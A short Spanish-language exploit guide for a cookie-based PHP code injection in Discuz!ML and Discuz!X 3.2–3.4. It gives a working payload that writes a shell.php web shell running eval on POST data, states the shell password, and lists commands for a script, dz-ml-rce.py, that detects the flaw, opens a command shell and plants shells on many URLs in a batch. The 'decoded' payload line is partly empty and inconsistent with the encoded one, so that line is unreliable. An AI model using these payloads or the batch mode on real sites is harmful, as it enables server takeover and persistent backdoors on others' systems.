
Sistemas afectados y versiones:Discuz!ML V3.2-3.4 Discuz!x V3.2-3.4
Sistemas afectados y versiones: Discuz!ML V3.2-3.4 Discuz!x V3.2-3.4 Causa de la vulnerabilidad: el sistema Discuz!ML no filtra el contenido del parámetro language recibido mediante 'l' en la cookie, lo que provoca concatenación de cadenas y la ejecución de código PHP.
En el campo de cookie aparecerá un campo xxxx_xxxx_language; la causa raíz es que este campo presenta una inyección que conduce a RCE.
Captura el paquete, localiza el valor de language en la cookie y cámbialo a
xxxx_xxxx_language=sc'.phpinfo().'
getshell
%27.%2Bfile_put_contents%28%27shell.php%27%2Curldecode%28%27%253C%253Fphp%2520eval%2528%2524_POST%255B%25221%2522%255D%2529%253B%253F%253E%27%29%29.%27 En realidad es:
'.+file_put_contents('shell.php',urldecode('')).'
Así se generará shell.php en la ruta y la contraseña de conexión es 1.
============================================================================================================================================================== Comprobar si existe la vulnerabilidad
python dz-ml-rce.py -u "http://www.xxx.cn/forum.php"
Modo cmdshell
python dz-ml-rce.py -u "http://www.xxx.cn/forum.php" --cmdshell
Modo getshell
python dz-ml-rce.py -u "http://www.xxx.cn/forum.php" --getshell
Detección en lote
python dz-ml-rce.py -f urls.txt
getshell en lote
python dz-ml-rce.py -f urls.txt --getshell